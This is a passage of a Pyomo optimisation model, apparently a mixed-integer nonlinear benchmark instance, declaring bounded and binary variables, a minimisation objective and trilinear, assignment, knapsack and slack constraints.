m.x49 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,2.02),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,4.01333333333333),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,4.76),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,5.96),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,42.0933333333333),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,99.28),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,6.59333333333333),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,61.8666666666667),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,56.2866666666667),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,41.5),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,62.4933333333333),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,80.9066666666667),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,26.1466666666667),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,38),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,62.24),initialize=0)
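# x136..x150: the terms summed in the objective below.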
m.x136 = Var(within=Reals,bounds=(0,0.5323080366),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,0.918715169866666),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,1.021726146),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,1.0706790744),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,7.32543671346667),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,15.2453990736),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,1.28061192466667),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,15.8815166933333),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,15.2472806811333),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,12.029055125),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,15.9672360214667),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,15.3736631157333),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,6.2237284564),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,8.85892556),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,17.2437830768),initialize=0)
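# x151..x158: variables with nonzero bounds, initialized at one bound; c36-c259
# below pair them with the slack variables x159..x278 (consistent with an
# absolute-deviation linearization).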
m.x151 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x152 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x153 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x154 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x155 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x156 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x157 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x158 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
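# x159..x278: nonnegative auxiliary variables; they act as slacks in c36-c259
# and are tied to x61..x120 through the equalities c260-c319.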
m.x159 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x177 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x261 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
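# x279..x293: defined by the trilinear equalities c2-c16 below; their upper
# bounds match those of x136..x150.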
m.x279 = Var(within=Reals,bounds=(0,0.5323080366),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,0.918715169866666),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,1.021726146),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,1.0706790744),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,7.32543671346667),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,15.2453990736),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,1.28061192466667),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,15.8815166933333),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,15.2472806811333),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,12.029055125),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,15.9672360214667),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,15.3736631157333),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,6.2237284564),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,8.85892556),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,17.2437830768),initialize=0)
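# b294..b355: binary (0/1) decision variables.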
m.b294 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b295 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b296 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b297 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b298 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b299 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b300 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b301 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b302 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b303 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b304 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b305 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b306 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b307 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b308 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b309 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b310 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b311 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b312 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b313 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b314 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b315 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b316 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b317 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b318 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b319 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b320 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b321 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b322 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b323 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b324 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b325 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b326 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b327 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b328 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b329 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b330 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b331 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b332 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b333 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b334 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b335 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b336 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b337 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b338 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b339 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b340 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b341 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b342 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b343 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b344 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b345 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b346 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b347 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b348 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b349 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b350 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b351 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b352 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b353 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b354 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b355 = Var(within=Binary,bounds=(0,1),initialize=0)
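# Objective: minimize the sum of x136 through x150.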
m.obj = Objective(expr= m.x136 + m.x137 + m.x138 + m.x139 + m.x140 + m.x141 + m.x142 + m.x143 + m.x144 + m.x145
+ m.x146 + m.x147 + m.x148 + m.x149 + m.x150, sense=minimize)
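# c2-c16: each of x279..x293 is set equal to a sum of four trilinear products
# (a common x121..x135 factor times paired x61..x120 and x1..x60 factors).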
m.c2 = Constraint(expr=-(m.x121*m.x61*m.x1 + m.x121*m.x62*m.x2 + m.x121*m.x63*m.x3 + m.x121*m.x64*m.x4) + m.x279 == 0)
m.c3 = Constraint(expr=-(m.x122*m.x65*m.x5 + m.x122*m.x66*m.x6 + m.x122*m.x67*m.x7 + m.x122*m.x68*m.x8) + m.x280 == 0)
m.c4 = Constraint(expr=-(m.x123*m.x69*m.x9 + m.x123*m.x70*m.x10 + m.x123*m.x71*m.x11 + m.x123*m.x72*m.x12) + m.x281
== 0)
m.c5 = Constraint(expr=-(m.x124*m.x73*m.x13 + m.x124*m.x74*m.x14 + m.x124*m.x75*m.x15 + m.x124*m.x76*m.x16) + m.x282
== 0)
m.c6 = Constraint(expr=-(m.x125*m.x77*m.x17 + m.x125*m.x78*m.x18 + m.x125*m.x79*m.x19 + m.x125*m.x80*m.x20) + m.x283
== 0)
m.c7 = Constraint(expr=-(m.x126*m.x81*m.x21 + m.x126*m.x82*m.x22 + m.x126*m.x83*m.x23 + m.x126*m.x84*m.x24) + m.x284
== 0)
m.c8 = Constraint(expr=-(m.x127*m.x85*m.x25 + m.x127*m.x86*m.x26 + m.x127*m.x87*m.x27 + m.x127*m.x88*m.x28) + m.x285
== 0)
m.c9 = Constraint(expr=-(m.x128*m.x89*m.x29 + m.x128*m.x90*m.x30 + m.x128*m.x91*m.x31 + m.x128*m.x92*m.x32) + m.x286
== 0)
m.c10 = Constraint(expr=-(m.x129*m.x93*m.x33 + m.x129*m.x94*m.x34 + m.x129*m.x95*m.x35 + m.x129*m.x96*m.x36) + m.x287
== 0)
m.c11 = Constraint(expr=-(m.x130*m.x97*m.x37 + m.x130*m.x98*m.x38 + m.x130*m.x99*m.x39 + m.x130*m.x100*m.x40) + m.x288
== 0)
m.c12 = Constraint(expr=-(m.x131*m.x101*m.x41 + m.x131*m.x102*m.x42 + m.x131*m.x103*m.x43 + m.x131*m.x104*m.x44)
+ m.x289 == 0)
m.c13 = Constraint(expr=-(m.x132*m.x105*m.x45 + m.x132*m.x106*m.x46 + m.x132*m.x107*m.x47 + m.x132*m.x108*m.x48)
+ m.x290 == 0)
m.c14 = Constraint(expr=-(m.x133*m.x109*m.x49 + m.x133*m.x110*m.x50 + m.x133*m.x111*m.x51 + m.x133*m.x112*m.x52)
+ m.x291 == 0)
m.c15 = Constraint(expr=-(m.x134*m.x113*m.x53 + m.x134*m.x114*m.x54 + m.x134*m.x115*m.x55 + m.x134*m.x116*m.x56)
+ m.x292 == 0)
m.c16 = Constraint(expr=-(m.x135*m.x117*m.x57 + m.x135*m.x118*m.x58 + m.x135*m.x119*m.x59 + m.x135*m.x120*m.x60)
+ m.x293 == 0)
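# c17-c31: each consecutive group of four variables among x1..x60 sums to 1.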
m.c17 = Constraint(expr= m.x1 + m.x2 + m.x3 + m.x4 == 1)
m.c18 = Constraint(expr= m.x5 + m.x6 + m.x7 + m.x8 == 1)
m.c19 = Constraint(expr= m.x9 + m.x10 + m.x11 + m.x12 == 1)
m.c20 = Constraint(expr= m.x13 + m.x14 + m.x15 + m.x16 == 1)
m.c21 = Constraint(expr= m.x17 + m.x18 + m.x19 + m.x20 == 1)
m.c22 = Constraint(expr= m.x21 + m.x22 + m.x23 + m.x24 == 1)
m.c23 = Constraint(expr= m.x25 + m.x26 + m.x27 + m.x28 == 1)
m.c24 = Constraint(expr= m.x29 + m.x30 + m.x31 + m.x32 == 1)
m.c25 = Constraint(expr= m.x33 + m.x34 + m.x35 + m.x36 == 1)
m.c26 = Constraint(expr= m.x37 + m.x38 + m.x39 + m.x40 == 1)
m.c27 = Constraint(expr= m.x41 + m.x42 + m.x43 + m.x44 == 1)
m.c28 = Constraint(expr= m.x45 + m.x46 + m.x47 + m.x48 == 1)
m.c29 = Constraint(expr= m.x49 + m.x50 + m.x51 + m.x52 == 1)
m.c30 = Constraint(expr= m.x53 + m.x54 + m.x55 + m.x56 == 1)
m.c31 = Constraint(expr= m.x57 + m.x58 + m.x59 + m.x60 == 1)
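# c32-c35: four knapsack-style limits of 153.54; the weights coincide with the
# upper bounds of x121..x135.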
m.c32 = Constraint(expr= 2.02*m.x1 + 4.01333333333333*m.x5 + 4.76*m.x9 + 5.96*m.x13 + 42.0933333333333*m.x17
+ 99.28*m.x21 + 6.59333333333333*m.x25 + 61.8666666666667*m.x29 + 56.2866666666667*m.x33
+ 41.5*m.x37 + 62.4933333333333*m.x41 + 80.9066666666667*m.x45 + 26.1466666666667*m.x49
+ 38*m.x53 + 62.24*m.x57 <= 153.54)
m.c33 = Constraint(expr= 2.02*m.x2 + 4.01333333333333*m.x6 + 4.76*m.x10 + 5.96*m.x14 + 42.0933333333333*m.x18
+ 99.28*m.x22 + 6.59333333333333*m.x26 + 61.8666666666667*m.x30 + 56.2866666666667*m.x34
+ 41.5*m.x38 + 62.4933333333333*m.x42 + 80.9066666666667*m.x46 + 26.1466666666667*m.x50
+ 38*m.x54 + 62.24*m.x58 <= 153.54)
m.c34 = Constraint(expr= 2.02*m.x3 + 4.01333333333333*m.x7 + 4.76*m.x11 + 5.96*m.x15 + 42.0933333333333*m.x19
+ 99.28*m.x23 + 6.59333333333333*m.x27 + 61.8666666666667*m.x31 + 56.2866666666667*m.x35
+ 41.5*m.x39 + 62.4933333333333*m.x43 + 80.9066666666667*m.x47 + 26.1466666666667*m.x51
+ 38*m.x55 + 62.24*m.x59 <= 153.54)
m.c35 = Constraint(expr= 2.02*m.x4 + 4.01333333333333*m.x8 + 4.76*m.x12 + 5.96*m.x16 + 42.0933333333333*m.x20
+ 99.28*m.x24 + 6.59333333333333*m.x28 + 61.8666666666667*m.x32 + 56.2866666666667*m.x36
+ 41.5*m.x40 + 62.4933333333333*m.x44 + 80.9066666666667*m.x48 + 26.1466666666667*m.x52
+ 38*m.x56 + 62.24*m.x60 <= 153.54)
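# c36-c259: paired one-sided inequalities; together they appear to force each
# slack in x159..x278 to be at least the absolute deviation of x151..x158 from
# a fixed reference value (pairs already implied by the variable bounds are
# omitted).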
m.c36 = Constraint(expr= m.x151 + m.x159 >= 0.29424122)
m.c37 = Constraint(expr= m.x152 + m.x160 >= 0.29424122)
m.c38 = Constraint(expr= m.x153 + m.x161 >= 0.29424122)
m.c39 = Constraint(expr= m.x154 + m.x162 >= 0.29424122)
m.c40 = Constraint(expr= m.x151 + m.x163 >= 0.29760193)
m.c41 = Constraint(expr= m.x152 + m.x164 >= 0.29760193)
m.c42 = Constraint(expr= m.x153 + m.x165 >= 0.29760193)
m.c43 = Constraint(expr= m.x154 + m.x166 >= 0.29760193)
m.c44 = Constraint(expr= m.x151 + m.x167 >= 0.35149534)
m.c45 = Constraint(expr= m.x152 + m.x168 >= 0.35149534)
m.c46 = Constraint(expr= m.x153 + m.x169 >= 0.35149534)
m.c47 = Constraint(expr= m.x154 + m.x170 >= 0.35149534)
m.c48 = Constraint(expr= m.x151 + m.x171 >= 0.30458283)
m.c49 = Constraint(expr= m.x152 + m.x172 >= 0.30458283)
m.c50 = Constraint(expr= m.x153 + m.x173 >= 0.30458283)
m.c51 = Constraint(expr= m.x154 + m.x174 >= 0.30458283)
m.c52 = Constraint(expr= m.x151 + m.x175 >= 0.29951066)
m.c53 = Constraint(expr= m.x152 + m.x176 >= 0.29951066)
m.c54 = Constraint(expr= m.x153 + m.x177 >= 0.29951066)
m.c55 = Constraint(expr= m.x154 + m.x178 >= 0.29951066)
m.c56 = Constraint(expr= m.x151 + m.x179 >= 0.30694357)
m.c57 = Constraint(expr= m.x152 + m.x180 >= 0.30694357)
m.c58 = Constraint(expr= m.x153 + m.x181 >= 0.30694357)
m.c59 = Constraint(expr= m.x154 + m.x182 >= 0.30694357)
m.c60 = Constraint(expr= m.x151 + m.x183 >= 0.33520661)
m.c61 = Constraint(expr= m.x152 + m.x184 >= 0.33520661)
m.c62 = Constraint(expr= m.x153 + m.x185 >= 0.33520661)
